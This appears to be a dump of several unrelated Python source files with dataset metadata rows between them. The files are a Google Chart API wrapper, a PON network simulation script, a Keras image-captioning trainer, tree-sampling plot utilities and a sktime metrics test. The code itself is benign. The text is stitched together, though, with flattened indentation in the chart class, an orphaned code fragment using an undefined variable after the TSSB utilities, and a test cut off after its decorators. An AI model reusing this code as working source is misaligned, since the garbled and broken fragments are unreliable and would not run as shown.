        self._dataset = dataset
        dict.__init__(self)
        if ctype:
            self['cht'] = self.check_type(ctype)
        self._encoding = kwargs.pop('encoding', None)
        self._scale = kwargs.pop('scale', None)
        self._apiurl = kwargs.pop('apiurl', APIURL)
        for k in kwargs:
            assert k in APIPARAMS, 'Invalid chart parameter: %s' % k
        self.update(kwargs)
        # Axes helper keeps a back-reference so its mutators can chain.
        self.axes = Axes(self)
@classmethod
def fromurl(cls, qs):
"""
Reverse a chart URL or dict into a GChart instance
>>> G = GChart.fromurl('http://chart.apis.google.com/chart?...')
>>> G
<GChartWrapper.GChart instance at...>
>>> G.image().save('chart.jpg','JPEG')
"""
if isinstance(qs, dict):
return cls(**qs)
return cls(**dict(parse_qsl(qs[qs.index('?')+1:])))
###################
# Callables
###################
def map(self, geo, country_codes):
"""
Creates a map of the defined geography with the given country/state codes
Geography choices are africa, asia, europe, middle_east, south_america, and world
ISO country codes can be found at http://code.google.com/apis/chart/isocodes.html
US state codes can be found at http://code.google.com/apis/chart/statecodes.html
APIPARAMS: chtm & chld
"""
assert geo in GEO, 'Geograpic area %s not recognized'%geo
self._geo = geo
self._ld = country_codes
return self
def level_data(self, *args):
"""
Just used in QRCode for the moment
args are error_correction,margin_size
APIPARAM: chld
"""
assert args[0].lower() in 'lmqh', 'Unknown EC level %s'%level
self['chld'] = '%s|%s'%args
return self
def bar(self, *args):
"""
For bar charts, specify bar thickness and spacing with the args
args are <bar width>,<space between bars>,<space between groups>
bar width can be relative or absolute, see the official doc
APIPARAM: chbh
"""
self['chbh'] = ','.join(map(str,args))
return self
def encoding(self, arg):
"""
Specifies the encoding to be used for the Encoder
Must be one of 'simple','text', or 'extended'
"""
self._encoding = arg
return self
def output_encoding(self, encoding):
"""
Output encoding to use for QRCode encoding
Must be one of 'Shift_JIS','UTF-8', or 'ISO-8859-1'
APIPARAM: choe
"""
assert encoding in ('Shift_JIS','UTF-8','ISO-8859-1'),\
'Unknown encoding %s'%encoding
self['choe'] = encoding
return self
def scale(self, *args):
"""
Scales the data down to the given size
args must be of the form::
<data set 1 minimum value>,
<data set 1 maximum value>,
<data set n minimum value>,
<data set n maximum value>
will only work with text encoding!
APIPARAM: chds
"""
self._scale = [','.join(map(smart_str, args))]
return self
def dataset(self, data, series=''):
"""
Update the chart's dataset, can be two dimensional or contain string data
"""
self._dataset = data
self._series = series
return self
def marker(self, *args):
"""
Defines markers one at a time for your graph
args are of the form::
<marker type>,
<color>,
<data set index>,
<data point>,
<size>,
<priority>
see the official developers doc for the complete spec
APIPARAM: chm
"""
if len(args[0]) == 1:
assert args[0] in MARKERS, 'Invalid marker type: %s'%args[0]
assert len(args) <= 6, 'Incorrect arguments %s'%str(args)
args = color_args(args, 1)
self.markers.append(','.join(map(str,args)) )
return self
def margin(self, left, right, top, bottom, lwidth=0, lheight=0):
"""
Set margins for chart area
args are of the form::
<left margin>,
<right margin>,
<top margin>,
<bottom margin>|
<legend width>,
<legend height>
APIPARAM: chma
"""
self['chma'] = '%d,%d,%d,%d' % (left, right, top, bottom)
if lwidth or lheight:
self['chma'] += '|%d,%d' % (lwidth, lheight)
return self
def line(self, *args):
"""
Called one at a time for each dataset
args are of the form::
<data set n line thickness>,
<length of line segment>,
<length of blank segment>
APIPARAM: chls
"""
self.lines.append(','.join(['%.1f'%x for x in map(float,args)]))
return self
def fill(self, *args):
"""
Apply a solid fill to your chart
args are of the form <fill type>,<fill style>,...
fill type must be one of c,bg,a
fill style must be one of s,lg,ls
the rest of the args refer to the particular style
APIPARAM: chf
"""
a,b = args[:2]
assert a in ('c','bg','a'), 'Fill type must be bg/c/a not %s'%a
assert b in ('s','lg','ls'), 'Fill style must be s/lg/ls not %s'%b
if len(args) == 3:
args = color_args(args, 2)
else:
args = color_args(args, 3,5)
self.fills.append(','.join(map(str,args)))
return self
def grid(self, *args):
"""
Apply a grid to your chart
args are of the form::
<x axis step size>,
<y axis step size>,
<length of line segment>,
<length of blank segment>
<x offset>,
<y offset>
APIPARAM: chg
"""
grids = map(str,map(float,args))
self['chg'] = ','.join(grids).replace('None','')
return self
def color(self, *args):
"""
Add a color for each dataset
args are of the form <color 1>,...<color n>
APIPARAM: chco
"""
args = color_args(args, *range(len(args)))
self['chco'] = ','.join(args)
return self
def type(self, type):
"""
Set the chart type, either Google API type or regular name
APIPARAM: cht
"""
self['cht'] = self.check_type(str(type))
return self
def label(self, *args):
"""
Add a simple label to your chart
call each time for each dataset
APIPARAM: chl
"""
if self['cht'] == 'qr':
self['chl'] = ''.join(map(str,args))
else:
self['chl'] = '|'.join(map(str,args))
return self
def legend(self, *args):
"""
Add a legend to your chart
call each time for each dataset
APIPARAM: chdl
"""
self['chdl'] = '|'.join(args)
return self
def legend_pos(self, pos):
"""
Define a position for your legend to occupy
APIPARAM: chdlp
"""
assert pos in LEGEND_POSITIONS, 'Unknown legend position: %s'%pos
self['chdlp'] = str(pos)
return self
def title(self, title, *args):
"""
Add a title to your chart
args are optional style params of the form <color>,<font size>
APIPARAMS: chtt,chts
"""
self['chtt'] = title
if args:
args = color_args(args, 0)
self['chts'] = ','.join(map(str,args))
return self
def size(self,*args):
"""
Set the size of the chart, args are width,height and can be tuple
APIPARAM: chs
"""
if len(args) == 2:
x,y = map(int,args)
else:
x,y = map(int,args[0])
self.check_size(x,y)
self['chs'] = '%dx%d'%(x,y)
return self
def orientation(self, angle):
"""
Set the chart dataset orientation
angle is <angle in radians>
APIPARAM: chp
"""
self['chp'] = '%f'%angle
return self
position = orientation
def render(self):
"""
Renders the chart context and axes into the dict data
"""
self.update(self.axes.render())
encoder = Encoder(self._encoding, None, self._series)
if not 'chs' in self:
self['chs'] = '300x150'
else:
size = self['chs'].split('x')
assert len(size) == 2, 'Invalid size, must be in the format WxH'
self.check_size(*map(int,size))
assert 'cht' in self, 'No chart type defined, use type method'
self['cht'] = self.check_type(self['cht'])
if ('any' in dir(self._dataset) and self._dataset.any()) or self._dataset:
self['chd'] = encoder.encode(self._dataset)
elif not 'choe' in self:
assert 'chd' in self, 'You must have a dataset, or use chd'
if self._scale:
assert self['chd'].startswith('t'),\
'You must use text encoding with chds'
self['chds'] = ','.join(self._scale)
if self._geo and self._ld:
self['chtm'] = self._geo
self['chld'] = self._ld
if self.lines:
self['chls'] = '|'.join(self.lines)
if self.markers:
self['chm'] = '|'.join(self.markers)
if self.fills:
self['chf'] = '|'.join(self.fills)
###################
# Checks
###################
def check_size(self,x,y):
"""
Make sure the chart size fits the standards
"""
assert x <= 1000, 'Width larger than 1,000'
assert y <= 1000, 'Height larger than 1,000'
assert x*y <= 300000, 'Resolution larger than 300,000'
def check_type(self, type):
"""Check to see if the type is either in TYPES or fits type name
Returns proper type
"""
if type in TYPES:
return type
tdict = dict(zip(TYPES,TYPES))
tdict.update({
'line': 'lc',
'bar': 'bvs',
'pie': 'p',
'venn': 'v',
'scater': 's',
'radar': 'r',
'meter': 'gom',
})
assert type in tdict, 'Invalid chart type: %s'%type
return tdict[type]
#####################
# Convience Functions
#####################
def getname(self):
"""
Gets the name of the chart, if it exists
"""
return self.get('chtt','')
def getdata(self):
"""
Returns the decoded dataset from chd param
"""
#XXX: Why again? not even sure decode works well
return Encoder(self._encoding).decode(self['chd'])
def _parts(self):
return ('%s=%s'%(k,smart_str(v)) for k,v in sorted(self.items()) if v)
def __str__(self):
return self.url
def __repr__(self):
return '<GChart.%s %s>'%(self.__class__.__name__, dict(self.items()))
@property
def url(self):
"""
Returns the rendered URL of the chart
"""
self.render()
return self._apiurl + '&'.join(self._parts()).replace(' ','+')
def show(self, *args, **kwargs):
"""
Shows the chart URL in a webbrowser
Other arguments passed to webbrowser.open
"""
from webbrowser import open as webopen
return webopen(str(self), *args, **kwargs)
def save(self, fname=None):
"""
Download the chart from the URL into a filename as a PNG
The filename defaults to the chart title (chtt) if any
"""
if not fname:
fname = self.getname()
assert fname != None, 'You must specify a filename to save to'
if not fname.endswith('.png'):
fname += '.png'
try:
urlretrieve(self.url, fname)
except Exception:
raise IOError('Problem saving %s to file'%fname)
return fname
def img(self, **kwargs):
"""
Returns an XHTML <img/> tag of the chart
kwargs can be other img tag attributes, which are strictly enforced
uses strict escaping on the url, necessary for proper XHTML
"""
safe = 'src="%s" ' % self.url.replace('&','&').replace('<', '<')\
.replace('>', '>').replace('"', '"').replace( "'", ''')
for item in kwargs.items():
if not item[0] in IMGATTRS:
raise AttributeError('Invalid img tag attribute: %s'%item[0])
safe += '%s="%s" '%item
return '<img %s/>'%safe
def urlopen(self):
"""
Grabs readable PNG file pointer
"""
req = Request(str(self))
try:
return urlopen(req)
except HTTPError:
_print('The server couldn\'t fulfill the request.')
except URLError:
_print('We failed to reach a server.')
def image(self):
"""
Returns a PngImageFile instance of the chart
You must have PIL installed for this to work
"""
try:
try:
import Image
except ImportError:
from PIL import Image
except ImportError:
raise ImportError('You must install PIL to fetch image objects')
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
return Image.open(StringIO(self.urlopen().read()))
def write(self, fp):
"""
Writes out PNG image data in chunks to file pointer fp
fp must support w or wb
"""
urlfp = self.urlopen().fp
while 1:
try:
fp.write(urlfp.next())
except StopIteration:
return
def checksum(self):
"""
Returns the unique SHA1 hexdigest of the chart URL param parts
good for unittesting...
"""
self.render()
return new_sha(''.join(sorted(self._parts()))).hexdigest()
# Now a whole mess of convenience classes
# *for those of us who dont speak API*
class QRCode(GChart):
    """Convenience subclass for QR codes (cht=qr, UTF-8 output encoding)."""
    def __init__(self, content='', **kwargs):
        kwargs['choe'] = 'UTF-8'
        # Accept either a plain string or a one-element sequence of strings.
        kwargs['chl'] = content if isinstance(content, str) else content[0]
        GChart.__init__(self, 'qr', None, **kwargs)
class _AbstractGChart(GChart):
o,t = {},None
def __init__(self, dataset, **kwargs):
kwargs.update(self.o)
GChart.__init__(self, self.t, dataset, **kwargs)
class Meter(_AbstractGChart): o,t = {'encoding':'text'},'gom'
class Line(_AbstractGChart): t = 'lc'
class LineXY(_AbstractGChart): t = 'lxy'
class HorizontalBarStack(_AbstractGChart): t = 'bhs'
class VerticalBarStack(_AbstractGChart): t = 'bvs'
class HorizontalBarGroup(_AbstractGChart): t = 'bhg'
class VerticalBarGroup(_AbstractGChart): t = 'bvg'
class Pie(_AbstractGChart): t = 'p'
class Pie3D(_AbstractGChart): t = 'p3'
class Venn(_AbstractGChart): t = 'v'
class Scatter(_AbstractGChart): t = 's'
class Sparkline(_AbstractGChart): t = 'ls'
class Radar(_AbstractGChart): t = 'r'
class RadarSpline(_AbstractGChart): t = 'rs'
class Map(_AbstractGChart): t = 't'
class PieC(_AbstractGChart): t = 'pc'
########################################
# Now for something completely different
########################################
class Text(GChart):
    """Outlined-text dynamic icon (chst=d_text_outline)."""
    def render(self): pass  # all params are fixed in __init__; nothing to render
    def __init__(self, *args):
        GChart.__init__(self)
        self['chst'] = 'd_text_outline'
        # Slots 0 and 3 are color-valued; everything is stringified for chld.
        args = list(map(str, color_args(args, 0, 3)))
        # NOTE(review): substring tests also accept '' ('' in 'lrh' is True);
        # a tuple membership test would be stricter.
        assert args[2] in 'lrh', 'Invalid text alignment'
        assert args[4] in '_b', 'Invalid font style'
        self['chld'] = '|'.join(args).replace('\r\n','|')\
            .replace('\r','|').replace('\n','|')
class Pin(GChart):
    """Dynamic-icon map pin (chst=d_map_*)."""
    def render(self): pass  # all params are fixed in __init__; nothing to render
    def __init__(self, ptype, *args):
        """
        ptype selects the pin family (one of PIN_TYPES); the remaining args
        are family-specific and are joined into chld, with the color-valued
        slots translated through color_args.
        """
        GChart.__init__(self)
        assert ptype in PIN_TYPES, 'Invalid type'
        if ptype == "pin_letter":
            # color-valued slots: args[1], args[2]
            args = color_args(args, 1,2)
        elif ptype == 'pin_icon':
            # color-valued slot: args[1]; args[0] must be a known icon
            args = list(color_args(args, 1))
            assert args[0] in PIN_ICONS, 'Invalid icon name'
        elif ptype == 'xpin_letter':
            # color-valued slots: args[2], args[3], args[4]
            args = list(color_args(args, 2,3,4))
            assert args[0] in PIN_SHAPES, 'Invalid pin shape'
            if not args[0].startswith('pin_'):
                args[0] = 'pin_%s'%args[0]
        elif ptype == 'xpin_icon':
            # color-valued slots: args[2], args[3]
            args = list(color_args(args, 2,3))
            assert args[0] in PIN_SHAPES, 'Invalid pin shape'
            if not args[0].startswith('pin_'):
                args[0] = 'pin_%s'%args[0]
            assert args[1] in PIN_ICONS, 'Invalid icon name'
        elif ptype == 'spin':
            # color-valued slot: args[2]
            args = color_args(args, 2)
        self['chst'] = 'd_map_%s'%ptype
        self['chld'] = '|'.join(map(str, args)).replace('\r\n','|')\
            .replace('\r','|').replace('\n','|')
    def shadow(self):
        """Return a copy of this pin configured to render as its shadow."""
        image = copy(self)
        chsts = self['chst'].split('_')
        chsts[-1] = 'shadow'
        # Assign through the dict interface: GChart subclasses dict and has
        # no `.data` attribute, so the previous `image.data['chst'] = ...`
        # raised AttributeError.
        image['chst'] = '_'.join(chsts)
        return image
class Note(GChart):
    """Dynamic-icon note / weather image (chst=d_f<type> or d_<type>)."""
    def render(self): pass  # all params are fixed in __init__; nothing to render
    def __init__(self, *args):
        GChart.__init__(self)
        assert args[0] in NOTE_TYPES,'Invalid note type'
        assert args[1] in NOTE_IMAGES,'Invalid note image'
        if args[0].find('note')>-1:
            # note-style types get the 'd_f' prefix; args[3] is a color slot
            self['chst'] = 'd_f%s'%args[0]
            args = list(color_args(args, 3))
        else:
            # non-note types: args[2] must name a known weather icon, and
            # the type itself is dropped from the chld payload
            self['chst'] = 'd_%s'%args[0]
            assert args[2] in NOTE_WEATHERS,'Invalid weather'
            args = args[1:]
        self['chld'] = '|'.join(map(str, args)).replace('\r\n','|')\
            .replace('\r','|').replace('\n','|')
class Bubble(GChart):
    """Dynamic-icon speech bubble (chst=d_bubble_*)."""
    def render(self): pass  # all params are fixed in __init__; nothing to render
    def __init__(self, btype, *args):
        """
        btype selects the bubble variant (one of BUBBLE_TYPES); the remaining
        args are variant-specific and are joined into chld, with the
        color-valued slots translated through color_args.
        """
        GChart.__init__(self)
        assert btype in BUBBLE_TYPES, 'Invalid type'
        if btype in ('icon_text_small','icon_text_big'):
            # color-valued slots: args[3], args[4]; args[0] must be a small icon
            args = list(color_args(args, 3,4))
            assert args[0] in BUBBLE_SICONS,'Invalid icon type'
        elif btype == 'icon_texts_big':
            # color-valued slots: args[2], args[3]; args[0] must be a large icon
            args = list(color_args(args, 2,3))
            assert args[0] in BUBBLE_LICONS,'Invalid icon type'
        elif btype == 'texts_big':
            # color-valued slots: args[1], args[2]
            args = color_args(args, 1,2)
        self['chst'] = 'd_bubble_%s'%btype
        self['chld'] = '|'.join(map(str, args)).replace('\r\n','|')\
            .replace('\r','|').replace('\n','|')
    def shadow(self):
        """Return a copy of this bubble configured as its shadow image."""
        image = copy(self)
        # Use item assignment: GChart subclasses dict and has no `.data`
        # attribute, so `image.data['chst'] = ...` raised AttributeError.
        image['chst'] = '%s_shadow'%self['chst']
        return image
| 4,203 | 457 | 970 |
5f42ca913e67b584e2439069cf41f85b536f737a | 1,166 | py | Python | template.py | franbeep/TWDM-PON-Sim | c34f626c737f03d280bb96fd1dbd4eaa291383e3 | [
"MIT"
] | 1 | 2021-11-19T07:20:09.000Z | 2021-11-19T07:20:09.000Z | template.py | franbeep/TWDM-PON-Sim | c34f626c737f03d280bb96fd1dbd4eaa291383e3 | [
"MIT"
] | null | null | null | template.py | franbeep/TWDM-PON-Sim | c34f626c737f03d280bb96fd1dbd4eaa291383e3 | [
"MIT"
] | null | null | null | import sim
# seed
sim.random.seed(13)
# environment
env = sim.simpy.Environment()
# writer
# packet_w = Writer("packet_", start="# id src init_time waited_time freq processed_time\n")
# default values
sim.tg_default_size = lambda x: 5000
sim.tg_default_dist = lambda x: 1
sim.ONU_consumption = lambda x: 15
sim.PN_consumption = lambda x: 25
sim.Ant_consumption = lambda x: 7
sim.DBA_IPACT_default_bandwidth = 5000
# constants
# topology
antenas = 3
onus = 2
pns = 2
splts = 1
max_freqs = 10
matrix = [
[0,3,10000],
[1,3,9000],
[2,4,13000],
[3,5,500],
[4,7,25000],
[5,7,23000],
[7,6,8000]
]
# nodes
nodes = sim.create_topology(env, antenas, onus, pns, splts, matrix, max_freqs)
# rules
nodes[5].end() # node 5 starts offline
nodes[0].end() # antenna 0 starts offline
nodes[1].end() # antenna 1 starts offline
print(nodes[3], "enabled:", nodes[3].enabled)
nodes[3].end() # onu 0 starts offline
print(nodes[3], "enabled:", nodes[3].enabled)
print("Begin.")
env.run(until=10)
print("End.")
# consumption
for n in nodes:
if(isinstance(n, sim.Splitter)):
continue
else:
print(str(n), "had consumption of:", n.consumption()) | 18.507937 | 92 | 0.678388 | import sim
# seed
sim.random.seed(13)
# environment
env = sim.simpy.Environment()
# writer
# packet_w = Writer("packet_", start="# id src init_time waited_time freq processed_time\n")
# default values
sim.tg_default_size = lambda x: 5000
sim.tg_default_dist = lambda x: 1
sim.ONU_consumption = lambda x: 15
sim.PN_consumption = lambda x: 25
sim.Ant_consumption = lambda x: 7
sim.DBA_IPACT_default_bandwidth = 5000
# constants
# topology
antenas = 3
onus = 2
pns = 2
splts = 1
max_freqs = 10
matrix = [
[0,3,10000],
[1,3,9000],
[2,4,13000],
[3,5,500],
[4,7,25000],
[5,7,23000],
[7,6,8000]
]
# nodes
nodes = sim.create_topology(env, antenas, onus, pns, splts, matrix, max_freqs)
# rules
nodes[5].end() # node 5 starts offline
nodes[0].end() # antenna 0 starts offline
nodes[1].end() # antenna 1 starts offline
print(nodes[3], "enabled:", nodes[3].enabled)
nodes[3].end() # onu 0 starts offline
print(nodes[3], "enabled:", nodes[3].enabled)
print("Begin.")
env.run(until=10)
print("End.")
# consumption
for n in nodes:
if(isinstance(n, sim.Splitter)):
continue
else:
print(str(n), "had consumption of:", n.consumption()) | 0 | 0 | 0 |
67cea391e6faee05921bb6b7f027d954dc5deb2b | 3,186 | py | Python | train.py | team-eyespace/show-tell-api | b9947091083174e5469fcf3cf3079fabd73789dd | [
"MIT"
] | null | null | null | train.py | team-eyespace/show-tell-api | b9947091083174e5469fcf3cf3079fabd73789dd | [
"MIT"
] | 20 | 2019-11-28T06:38:26.000Z | 2022-03-12T00:41:52.000Z | train.py | team-eyespace/show-tell-api | b9947091083174e5469fcf3cf3079fabd73789dd | [
"MIT"
] | 1 | 2019-12-22T08:58:30.000Z | 2019-12-22T08:58:30.000Z | '''
File to train the NIC model, based on the paper:
https://www.cv-foundation.org/openaccess/content_cvpr_2015/papers/Vinyals_Show_and_Tell_2015_CVPR_paper.pdf
'''
from keras.callbacks import ModelCheckpoint
from keras.models import Model, load_model
from keras.optimizers import Adam
from keras.utils import plot_model
from NIC import model
from preprocessing.text import create_tokenizer
from utils import batch_generator
from TensorBoardCaption import TensorBoardCaption
if __name__ == "__main__":
dict_dir = './datasets/features_dict.pkl'
train_dir = './datasets/Flickr8k_text/Flickr_8k.trainImages.txt'
dev_dir = './datasets/Flickr8k_text/Flickr_8k.devImages.txt'
token_dir = './datasets/Flickr8k_text/Flickr8k.token.txt'
# where to put the model weigths
params_dir = './model-params'
dirs_dict={'dict_dir':dict_dir, 'train_dir':train_dir, 'dev_dir':dev_dir,
'token_dir':token_dir, 'params_dir':params_dir}
training(dirs_dict, lr=0.001, decay=0., reg = 1e-4, batch_size = 120, epochs = 2,
max_len = 24, initial_epoch = 0, previous_model = None)
| 40.846154 | 115 | 0.710609 | '''
File to train the NIC model, based on the paper:
https://www.cv-foundation.org/openaccess/content_cvpr_2015/papers/Vinyals_Show_and_Tell_2015_CVPR_paper.pdf
'''
from keras.callbacks import ModelCheckpoint
from keras.models import Model, load_model
from keras.optimizers import Adam
from keras.utils import plot_model
from NIC import model
from preprocessing.text import create_tokenizer
from utils import batch_generator
from TensorBoardCaption import TensorBoardCaption
def training(dirs_dict, lr, decay, reg, batch_size, epochs, max_len, initial_epoch, previous_model = None):
    """Train the NIC captioning model with progressive (generator) loading.

    Args:
        dirs_dict: dict with keys 'dict_dir', 'token_dir', 'train_dir',
            'dev_dir', 'params_dir' pointing at features, captions, the
            train/dev splits and the checkpoint output directory.
        lr: Adam learning rate.
        decay: Adam learning-rate decay.
        reg: regularization strength forwarded to the NIC model builder.
        batch_size: training batch size fed to the generator.
        epochs: number of epochs to train for.
        max_len: maximum caption length in tokens.
        initial_epoch: epoch to resume counting from (continued training).
        previous_model: optional path to weights to warm-start from; when
            None, the model summary and architecture diagram are emitted
            instead.
    """
    dict_dir = dirs_dict['dict_dir']
    token_dir = dirs_dict['token_dir']
    train_dir = dirs_dict['train_dir']
    dev_dir = dirs_dict['dev_dir']
    params_dir = dirs_dict['params_dir']
    # Use Tokenizer to create vocabulary (with start/end sentence markers)
    tokenizer = create_tokenizer(train_dir, token_dir, start_end = True)
    # Progressive loading
    # if batch size of training set is 30 and total 30000 sentences, then 1000 steps.
    # if batch size of dev set is 50 and total 5000 sentences, then 100 steps.
    generator_train = batch_generator(batch_size, max_len, tokenizer, dict_dir, train_dir, token_dir)
    generator_dev = batch_generator(50, max_len, tokenizer, dict_dir, dev_dir, token_dir)
    vocab_size = tokenizer.num_words or (len(tokenizer.word_index)+1)
    # Define NIC model structure
    NIC_model = model(vocab_size, max_len, reg)
    if not previous_model:
        NIC_model.summary()
        plot_model(NIC_model, to_file='./model.png',show_shapes=True)
    else:
        NIC_model.load_weights(previous_model, by_name = True, skip_mismatch=True)
    # Define checkpoint callback (one weights-only checkpoint per epoch)
    file_path = params_dir + '/model-ep{epoch:03d}-loss{loss:.4f}-val_loss{val_loss:.4f}.h5'
    checkpoint = ModelCheckpoint(file_path, monitor='val_loss', verbose=1, save_weights_only = True, period=1)
    tbc = TensorBoardCaption(tokenizer, vocab_size, max_len, log_dir = './logs',
                            feed_pics_dir = './put-your-image-here',
                            model_params_dir = params_dir)
    # Compile the model
    NIC_model.compile(loss='categorical_crossentropy', optimizer=Adam(lr = lr, decay=decay), metrics=['accuracy'])
    # train; steps_per_epoch assumes ~30000 training sentences (see note above)
    NIC_model.fit_generator(generator_train, steps_per_epoch=30000//batch_size, epochs=epochs, verbose=2,
                           callbacks=[checkpoint, tbc],
                           validation_data = generator_dev, validation_steps = 100, initial_epoch = initial_epoch)
if __name__ == "__main__":
    # Flickr8k layout: precomputed image-feature dict plus the official
    # train/dev split lists and the raw caption token file.
    dict_dir = './datasets/features_dict.pkl'
    train_dir = './datasets/Flickr8k_text/Flickr_8k.trainImages.txt'
    dev_dir = './datasets/Flickr8k_text/Flickr_8k.devImages.txt'
    token_dir = './datasets/Flickr8k_text/Flickr8k.token.txt'
    # where to put the model weights
    params_dir = './model-params'
    dirs_dict={'dict_dir':dict_dir, 'train_dir':train_dir, 'dev_dir':dev_dir,
                'token_dir':token_dir, 'params_dir':params_dir}
    # Short smoke-training run: 2 epochs from scratch.
    training(dirs_dict, lr=0.001, decay=0., reg = 1e-4, batch_size = 120, epochs = 2,
            max_len = 24, initial_epoch = 0, previous_model = None)
| 2,035 | 0 | 23 |
1bc936cdd0503d0f79ce563f75d7d7191567ce61 | 1,943 | py | Python | trees/tssb/util.py | sharadmv/trees | ed8ce87718da753a13fe1707487df7b93037ae2f | [
"MIT"
] | 3 | 2017-01-18T21:20:26.000Z | 2019-01-22T19:11:58.000Z | trees/tssb/util.py | sharadmv/trees | ed8ce87718da753a13fe1707487df7b93037ae2f | [
"MIT"
] | null | null | null | trees/tssb/util.py | sharadmv/trees | ed8ce87718da753a13fe1707487df7b93037ae2f | [
"MIT"
] | 3 | 2016-10-13T06:31:25.000Z | 2021-11-08T19:09:03.000Z | import cPickle as pickle
import matplotlib.pyplot as plt
import numpy as np
import networkx as nx
| 29.439394 | 89 | 0.594956 | import cPickle as pickle
import matplotlib.pyplot as plt
import numpy as np
import networkx as nx
def plot_tssb(tssb, ax=None):
    """Draw the TSSB tree with networkx + graphviz.

    Builds a DiGraph from the TSSB's root, lays it out with graphviz 'dot',
    and labels each node with its point count.

    Args:
        tssb: TSSB instance; tssb.root must not be None.
        ax: optional matplotlib axes to draw into (axis frame is hidden).

    Returns:
        (g, nodes, labels): the DiGraph, the drawn node collection, and the
        label artist dict.

    NOTE(review): nx.graphviz_layout requires a graphviz binding and was
    moved to nx.nx_agraph.graphviz_layout in newer networkx releases —
    confirm against the pinned networkx version.
    """
    g = nx.DiGraph()
    if ax:
        ax.set_axis_off()
    assert tssb.root is not None
    add_nodes(g, tssb.root)
    pos = nx.graphviz_layout(g, prog='dot', args='-Granksep=100.0')
    # Label each node with the number of data points assigned to it.
    labels = {n: n.point_count for n in g.nodes()}
    nodes = nx.draw_networkx_nodes(g, pos,
                                   node_color='b',
                                   node_size=300,
                                   alpha=0.8, ax=ax)
    nx.draw_networkx_edges(g, pos,
                           alpha=0.8, arrows=False, ax=ax)
    labels = nx.draw_networkx_labels(g, pos, labels, font_size=12, font_color='w', ax=ax)
    return g, nodes, labels
def add_nodes(g, node):
    """Recursively add an edge from *node* to each descendant into graph *g*."""
    for child in node.children.values():
        g.add_edge(node, child)
        add_nodes(g, child)
def generate_data(N, tssb, collect=True):
    """Draw N observations from the TSSB.

    Each draw samples a (node, index) pair from the TSSB and then one
    observation from that node.

    Args:
        N: number of points to generate.
        tssb: TSSB providing sample_one() -> (node, index) and
            garbage_collect().
        collect: if True, garbage-collect unused TSSB nodes afterwards.

    Returns:
        (data, y): ndarray of the N samples and the list of node indices.
    """
    data = []
    y = []
    # `range` instead of the Python-2-only `xrange`: identical iteration
    # behavior, but also works under Python 3.
    for i in range(N):
        node, index = tssb.sample_one()
        data.append(node.sample_one())
        y.append(index)
    if collect:
        tssb.garbage_collect()
    return np.array(data), y
def plot_data(X, z, tssb=None):
    """Scatter-plot 2-D points, colored by the depth of each point's node.

    Args:
        X: iterable of (x, y) coordinate pairs.
        z: per-point node indices; len(z[i]) is treated as tree depth.
        tssb: unused; kept for interface compatibility.
    """
    depths = sorted(set(len(node) for node in set(z)))
    # Fix: the original called seaborn's sns.color_palette, but seaborn is
    # never imported in this module (NameError at runtime). Sample the
    # equivalent diverging colormap from matplotlib instead.
    palette = plt.cm.coolwarm(np.linspace(0, 1, len(depths)))
    colors = dict(zip(depths, palette))
    for i, (x, y) in enumerate(X):
        plt.scatter(x, y, color=colors[len(z[i])])
def save_tssb(tssb, location):
    """Serialize the TSSB's state to *location* via pickle."""
    with open(location, 'wb') as out:
        pickle.dump(tssb.get_state(), out)
def load_tssb(location):
    """Load and return a previously pickled TSSB state from *location*."""
    with open(location, 'rb') as src:
        return pickle.load(src)
points = xrange(N)
nodes = set([t.point_index(point)[1] for point in points])
assignments = {}
for node in nodes:
assignments[node] = [y[p] for p in t.get_node(node).points]
return assignments
| 1,684 | 0 | 161 |
d4f988f814604af80219f450450b3d48b4a82f8f | 2,034 | py | Python | sktime/performance_metrics/tests/test_metrics_classes.py | khrapovs/sktime | 1589d007ef5dbcdc1f42f2c8278919ebed516358 | [
"BSD-3-Clause"
] | 1 | 2021-12-22T02:45:39.000Z | 2021-12-22T02:45:39.000Z | sktime/performance_metrics/tests/test_metrics_classes.py | khrapovs/sktime | 1589d007ef5dbcdc1f42f2c8278919ebed516358 | [
"BSD-3-Clause"
] | null | null | null | sktime/performance_metrics/tests/test_metrics_classes.py | khrapovs/sktime | 1589d007ef5dbcdc1f42f2c8278919ebed516358 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""Tests for classes in _classes module."""
from inspect import getmembers, isclass
import numpy as np
import pandas as pd
import pytest
from sktime.performance_metrics.forecasting import _classes
from sktime.utils._testing.series import _make_series
metric_classes = getmembers(_classes, isclass)
exclude_starts_with = ("_", "Base")
metric_classes = [x for x in metric_classes if not x[0].startswith(exclude_starts_with)]
names, metrics = zip(*metric_classes)
@pytest.mark.parametrize("n_columns", [1, 2])
@pytest.mark.parametrize("multioutput", ["uniform_average", "raw_values"])
@pytest.mark.parametrize("metric", metrics, ids=names)
def test_metric_output_direct(metric, multioutput, n_columns):
"""Test output is of correct type, dependent on multioutput.
Also tests that four ways to call the metric yield equivalent results:
1. using the __call__ dunder
2. calling the evaluate method
"""
y_pred = _make_series(n_columns=n_columns, n_timepoints=20, random_state=21)
y_true = _make_series(n_columns=n_columns, n_timepoints=20, random_state=42)
# coerce to DataFrame since _make_series does not return consisten output type
y_pred = pd.DataFrame(y_pred)
y_true = pd.DataFrame(y_true)
res = dict()
res[1] = metric(multioutput=multioutput)(
y_true=y_true,
y_pred=y_pred,
y_pred_benchmark=y_pred,
y_train=y_true,
)
res[2] = metric(multioutput=multioutput).evaluate(
y_true=y_true,
y_pred=y_pred,
y_pred_benchmark=y_pred,
y_train=y_true,
)
if multioutput == "uniform_average":
assert all(isinstance(x, float) for x in res.values())
elif multioutput == "raw_values":
assert all(isinstance(x, np.ndarray) for x in res.values())
assert all(x.ndim == 1 for x in res.values())
assert all(len(x) == len(y_true.columns) for x in res.values())
# assert results from all options are equal
assert np.allclose(res[1], res[2])
| 32.806452 | 88 | 0.701573 | # -*- coding: utf-8 -*-
"""Tests for classes in _classes module."""
from inspect import getmembers, isclass
import numpy as np
import pandas as pd
import pytest
from sktime.performance_metrics.forecasting import _classes
from sktime.utils._testing.series import _make_series
# Discover every public metric class exported by _classes, skipping private
# helpers ("_...") and the abstract Base* classes; split into parallel
# (names, classes) tuples for parametrization below.
metric_classes = getmembers(_classes, isclass)
exclude_starts_with = ("_", "Base")
metric_classes = [x for x in metric_classes if not x[0].startswith(exclude_starts_with)]
names, metrics = zip(*metric_classes)
@pytest.mark.parametrize("n_columns", [1, 2])
@pytest.mark.parametrize("multioutput", ["uniform_average", "raw_values"])
@pytest.mark.parametrize("metric", metrics, ids=names)
